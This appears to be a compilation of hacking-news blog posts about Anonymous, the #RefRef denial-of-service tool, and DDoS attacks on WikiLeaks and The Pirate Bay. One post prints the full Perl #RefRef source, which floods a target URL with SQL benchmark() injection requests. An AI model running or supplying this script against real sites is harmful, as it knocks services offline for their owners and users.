An Anonymous Member Took Responsibility of Cyberattack on Wikileaks

A Twitter user who claims affiliation to the infamous Anonymous hacktivist collective has claimed responsibility for launching denial of service attacks that floored WikiLeaks on Tuesday night. The attack against the whistle-blowing site occurred at the same time as less high-profile assaults against Pastebin and 4Chan, the anarchic image board and birthplace of Anonymous.
The assaults were reportedly field trials for a new JavaScript-based DDoS tool, dubbed RefRef, designed to exploit SQL server flaws on targeted websites. RefRef is the successor to the notorious LOIC attack tool, which discloses users' IP address by default, as many arrested hacktivists now know only too well.

"As we returned from our days of hibernation, we have noticed that some may have took claim of developing #RefRef. We have seem the blatantly fake www.RefRef.org, and some more accounts that have taken claim to #RefRef – They are simply not true.
RefRef will be released to the public on September 17th. 2011, and any code you may have stumbled upon is strictly false. It is JavaScript, not Perl.
And to prove the fact that #RefRef is still in the works, we tested it again, not on (@Pastebin) – sorry we still owe you for that one, but on (@WikiLeaks) www.WikiLeaks.org . This was a #RefRef test, and again, it worked flawlessly."

Anonymous began with attacks against the Church of Scientology three years ago, but only gained mainstream fame when it launched denial of service attacks in support of WikiLeaks and against financial service firms that shut down accounts maintained by the whistle-blowing websites.
A Twitter account (@AnonCMD) linked to an Anonymous activist refers to a "personal vendetta against WikiLeaks" adding that "we are sorry we took you down. We are even"

-News Source (The Register)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">An Anonymous Member Took Responsibility of Cyberattack on Wikileaks"https://www.voiceofgreyhat.com/2011/09/anonymous-member-took-responsibility-of.html</a>

Long Awaited DDOS tool of Anon #RefRef Source Code is Now Available

Earlier I have told that LOIC will be replaced with a new tool named #RefRef. So here it it. Long Awaited DDOS tool of Anon #RefRef Source Code is Now Available. The tool has been programed in perl, python & javascript. First it was tested on pastebin, and as expected it get success. 

Source Code Of #RefRef:-

#!usr/bin/perl
#RefRef (C) Anonymous 2011
 
use LWP::UserAgent;
 
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
 
head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
sintax();
}
copyright();
 
sub now {
print "\n[+] Target : ".$_[0]."\n";
print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n";
while(true) {
$SIG{INT} = \&adios;
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print "[+] Web Off\n";
copyright();
}}}
 
sub adios {
print "\n[+] Stoping attack\n";
copyright();
}
 
sub head {
print "\n\n-- == #RefRef == --\n\n";
}
 
sub copyright {
print "\n\n-- == RefRef == --\n\n";
exit(1);
}
 
sub sintax {
print "\n[+] Sintax : $0 \n";
}
 
sub toma {
return $nave->get($_[0]);
}
 
# ¿ The End ?

The Video Of Executing #RefRef:- 

For More information Click Here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Long Awaited DDOS tool of Anon #RefRef Source Code is Now Available"https://www.voiceofgreyhat.com/2011/08/long-awaited-ddos-tool-of-anon-refref.html</a>

It's Time to Replace LOIC (Anonymous is developing a new DDoS tool #RefRef)

Anonymous is developing a new DDoS tool. So far, what they have is something that is platform neutral, leveraging JavaScript and vulnerabilities within SQL to create a devastating impact on the targeted website. But will the tool last, and will it make law enforcement’s job harder in the long run?
Previously, Low Orbit Ion Canon (LOIC) was the go to weapon for Anonymous supporters during protests against dictators in North Africa, and Operation: Payback. However, LOIC is also the reason scores of people have been arrested in the last year, so many feel its time is at an end.
The new tool, called #RefRef, is set to be released in September, according to an Anon promoting it on IRC this afternoon. Developed with JavaScript, the tool is said to use the target site’s own processing power against itself.
In the end, the server succumbs to resource exhaustion due to #RefRef’s usage. An attack vector that has existed for some time, resource exhaustion is often skipped over by attackers who favor the brute force of a DDoS attack sourced from bots or tools such as LOIC.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">It's Time to Replace LOIC (Anonymous is developing a new DDoS tool #RefRef)"https://www.voiceofgreyhat.com/2011/07/its-time-to-replace-loic-anonymous-is.html</a>

DSH is Taking Anonymous More Seriously & Issued A Security Bulletin To Warn About The Upcoming Cyber Threats

The Department of Homeland Security is beginning to take Anonymous and other non-professional cyber-attackers more seriously as it issues a warning about potential attacks.

The United States Department of Homeland Security warned the security community about potential attacks from hacking collective Anonymous over the next few months. The Sept. 2 security bulletin from the DHS National Cyber-Security and Communications Integration Center warned financial services companies to be on the lookout for attackers operating under the Anonymous umbrella to "solicit ideologically dissatisfied, sympathetic employees" to the cause. The collective recently took to Twitter to persuade employees within the financial sector to hand over information and access to enterprise networks. Though such attempts may have been unsuccessful so far, "unwilling coercion through embarrassment or blackmail may be a risk to personnel," the DHS bulletin warned.

DHS issued the bulletin primarily for cyber-security professionals and staff in charge of protecting critical infrastructure. The bulletin also refer to new tools that Anonymous may be using in launching future attacks. Anonymous has been primarily using the Low Orbit Ion Cannon, a fairly simple testing software that can ping a server repeatedly, to launch its distributed denial of service attacks. Some of the members have been working on a new DDoS tool, based on JavaScript,  dubbed #RefRef.

The new attack tool is said to be capable of using the server's own resources and processing power to launch a denial of service attack against itself, but "so far it's unclear what the true capabilities of #RefRef are," the DHS said in the bulletin. The tool is slated to be released Sept. 17.

DHS also referenced the "Apache Killer" Perl script that can be used to launch denial of service attacks against Web servers running the popular Apache software. Apache developers released a patch earlier this week to fix the vulnerability in Apache 2.2. Administrators have been urged to patch their servers immediately.

The DHS also mentioned three cyber-attacks and civil protests Anonymous has already announced. "Occupy Wall Street" is the first scheduled one, for Sept. 17. Announced by a group Adbusters in July and actively supported by Anonymous, the goal is to get 20,000 individuals to gather on Wall Street to protest various U.S. government policies. Similar rallies targeting financial districts are being planned in Madrid, Milan, London, Paris and San Francisco.

Another protest in October, also led by Adbusters, is scheduled to be held at the Washington, D.C. National Mall to mark the 10th anniversary of the war in Afghanistan. There is also the supposed Nov. 11 attack against Facebook and Project Mayhem, scheduled for Dec. 21, 2012, DHS warned. There are indications that Project Mayhem would be a combination of physical disruption and targeting of information systems.

The bulletin itself is unusual in that DHS hasn't commented on the activities of Anonymous ever since the group stepped up its efforts over the past few months, attacking federal agencies and private corporations to protest a wide range of issues. As anyone following the security space undoubtedly knows, there have been at least one or two attacks by Anonymous, even more, each week for the past few months, so the bulletin may be just stating the obvious when warning of future potential attacks.

"Anonymous has shown through recently reported incidents that it has members who have relatively more advanced technical capabilities who can also marshal large numbers of willing, but less technical, participants for DDOS activities," the DHS said.

-News Source (e-Week)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">DSH is Taking Anonymous More Seriously & Issued A Security Bulletin To Warn About The Upcoming Cyber Threats"https://www.voiceofgreyhat.com/2011/09/dsh-is-taking-anonymous-more-seriously.html</a>

Pirate Bay & WikiLeaks Goes Offline After Prolonged Denial of Service Attack

Pirate Bay & WikiLeaks Goes Offline After Prolonged Denial of Service Attack

 

Most popular and controversial file sharing site "The Pirate Bay" faced a prolonged distributed denial of service which interrupts the service. In their official Facebook page confirmed the attack. DDoS attack left the site largely inaccessible for the last 24 hours, with only intermittent service in the UK. The Pirate Bay took to its Facebook page to confirm the attack, saying that it did not know who was behind it, although it ‘had its suspicions’. There had initially been speculation that the attack on The Pirate Bay was initiated as an act of revenge by the Anonymous hacker collective after members of The Pirate Bay criticised Anonymous for organizing DDoS attacks on UK internet service provider (ISP) Virgin Media for blocking access to The Pirate Bay. The Pirate Bay has said, however, that Anonymous is not to blame for the attack on its site.

Meanwhile, a former Anonymous member by the name of AnonNyre has claimed responsibility for DDoSing the Pirate Bay site. There is no evidence though to confirm that AnonNyre was actually behind the attacks. 

Not only TPB, but also Wikileaks official website faced massive distributed denial of service attack which hampers the site for 72 long hours. According to official twitter of Wikileaks "WikiLeaks has been under sustained DDOS attacks over the last 72 hours..."  

This not the first time, before this Wikileaks have faced cyber attack and an Anonymous member took responsibility of that Attack on Wikileaks website. That  time the attacker executed a massive Denial of Service while using newly developed tool #refref. In an exlusive report by Corero Network Security said the attack on Wikileaks site was one of the largest DDoS attack ever took place in 2011. But still it is not clear if there is any connection between the two incidents. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Pirate Bay & WikiLeaks Goes Offline After Prolonged Denial of Service Attack"https://www.voiceofgreyhat.com/2012/05/pirate-bay-wikileaks-goes-offline-after.html</a>

WikiLeaks Again Under DDoS Attack For Last 5 Days

WikiLeaks Again Under DDoS Attack For Last 5 Days

Yet again Wikileaks official website faced denial of service attack. Earlier we have seen two similar attack, first it was in 2011 when  an Anonymous member took responsibility of that Attack on Wikileaks website. That  time the attacker executed a massive Denial of Service while using newly developed tool #refref. In an exlusive report by Corero Network Security said the attack on Wikileaks site was one of the largest DDoS attack ever took place in 2011. Back in May this year, Wikileaks was also taken down by a DDoS attack which also infected controversial file sharing site "The Pirate Bay". As per sources the site has been down for the last five days, during which it has been experiencing a massive Distributed Denial of Service (DDoS) attack. So far it was the longest attack ever happened against Wikileaks. The most notable thing is that according the organisation already claimed a government entity is behind the hit. Many of other unofficial sources are connecting this attack with a recent story, which restarted the WikiLeaks donation. At the time of the attack team VOGH took the following screen shot which clearly showing that Wikileaks.org was indeed inaccessible. 

The first tweet was sent out on August 3:-

WikiLeaks.org is down for unknown reasons. We are investigating. wikileaks.org is still up.

#WikiLeaks donation page and FDNN portal down. You can still donate via supporter merchandise: http://wikileaks.spreadshirt.com/ http://www.cdbaby.com/cd/wikileaksbeattheblockade2

WikiLeaks has been under sustained large scale DDoS attacks since August 3. Help us purchase more bandwidth: http://shop.wikileaks.org/donate

Speculation on DDoS attack against WikiLeaks timing: 1. Olympics cover 2. Upcomng release. 3. Ongoing Syria, Stratfor releases

Wikileaks est actuellement sous le feu d’une attaque DDOS d’ampleur.

wlcentral.org and http://justice4assange.com are now down.

Update: http://wikileaks.org https://secure.fdn2.org/fdn2/nouser http://cabledrum.net/ still down. http://wlcentral.org/ http://justice4assange.com/ back online.

UPDATE: WikiLeaks battles ongoing DDoS attack

#WikiLeaks .onion mirror available: http://isax7s5yooqgelbr.onion/ Accessible only through Tor

Most WikiLeaks mirrors have been brought offline as well, with some coming back today. Even sites simply related to WikiLeaks have been targeted. These include the WikiLeaks-endorsed website Cabledrum, including its mirror of the WikiLeaks website, and French non-profit FDNN, which hosts a WikiLeaks' donation portal. The latter was attacked shortly after WikiLeaks linked to it as an alternative to donate while the WikiLeaks website is down. WL Central and Justice for Assange were also attacked for a short period of time. According to Zdnet a hacker group calling themselves 'AntiLeaks' is claiming responsibility for the attack, and has issued the following statement:-
"You can call me DietPepsi. I am the leader of AntiLeaks. We are not doing this to call attention to ourselves. We are young adults, citizens of the United States of America and are deeply concerned about the recent developments with Julian Assange and his attempt at aslyum in Ecuador.
Assange is the head of a new breed of terrorist. We are doing this as a protest against his attempt to escape justice into Ecuador. This would be a catalyst for many more like him to rise up in his place. We will not stop and they will not stop us."

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">WikiLeaks Again Under DDoS Attack For Last 5 Days"https://www.voiceofgreyhat.com/2012/08/WikiLeaks-Again-Under-DDoS-Attack.html</a>

Wikileaks.org Hacked By Sec Indi Security Team !!!

Wikileaks.org hacked By Sec Indi Security Team

Sec Indi Security Team strikes again. This time also they have maintained their class. If you dig the history you will find that this group has already made thier influence in the cyber space. Earlier they have found SQL-i vulnerability on the official website of US Senate, also they have hacked the Admin panel of famous Indian website click India. Now they have targeted Wikileaks official website. And as expected they have found a Cross-site request forgery (CSRF) vulnerability in wikileaks website. Sec Indi Security Team also submitted the vulnerable link. To know that link click Here. This not the first time, before this Wikileaks have faced cyber attack & an Anonymous member took responsibility of that Attack on Wikileaks website. That was a massive Denial of Service attack executed by newly developed tool #refref. Also that DDoS attack was recognized as one of biggest cyber attack in 2011.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Wikileaks.org Hacked By Sec Indi Security Team !!!"https://www.voiceofgreyhat.com/2012/01/wikileaksorg-hacked-by-sec-indi.html</a>

Anonymous-OS Alpha -First Operating System Released By #Anonymous

Anonymous-OS Alpha - First Operating System Released By #Anonymous

Earlier hacktivist Anonymous has released several DoS tool like LOIC, #refref, HOIC and so on but now we have all in one. Anonymous has officially released their first Operating system named Anonymous-OS. Basically its a live ubuntu-based distribution and created for educational purposes, to checking the security of web pages. In short Anonymous-OS can be regarded as a penetration testing distribution like BackBox, BackTrack and so on.

Preinstalled Apps on Anonymous-OS:-
- ParolaPass Password Generator
- Find Host IP
- Anonymous HOIC
- Ddosim
- Pyloris
- Slowloris
- TorsHammer
- Sqlmap
- Havij
- Sql Poison
- Admin Finder
- John the Ripper
- Hash Identifier
- Tor
- XChat IRC
- Pidgin
- Vidalia
- Polipo
- JonDo
- i2p
- Wireshark
- Zenmap

As expected in a sourceforge project page the OS is made available for download. For Additional information & to Download Anonymous-OS click Here. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Anonymous-OS Alpha -First Operating System Released By #Anonymous"https://www.voiceofgreyhat.com/2012/03/anonymous-os-alpha-first-operating.html</a>

DHS Bulletin: Anonymous & Associated Hacker Groups Deploying New Cyber Attack Tools

Department of Homeland Security (DSH) released a new bulletin A-0011-NCCIC -120020110914  (U//FOUO) saying that Anonymous and Associated hackers groups are developing and deploying new cyber attack tools. The bulletin contains brif of Anon, Their attacks on the Internet, cyber attack tools, exploits (LOIC, #RefRef, Apache Killer, URGE, Anonware) and so on. 

For More information and to download the bulletin Click Here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">DHS Bulletin: Anonymous & Associated Hacker Groups Deploying New Cyber Attack Tools"https://www.voiceofgreyhat.com/2011/10/dhs-bulletin-anonymous-associated.html</a>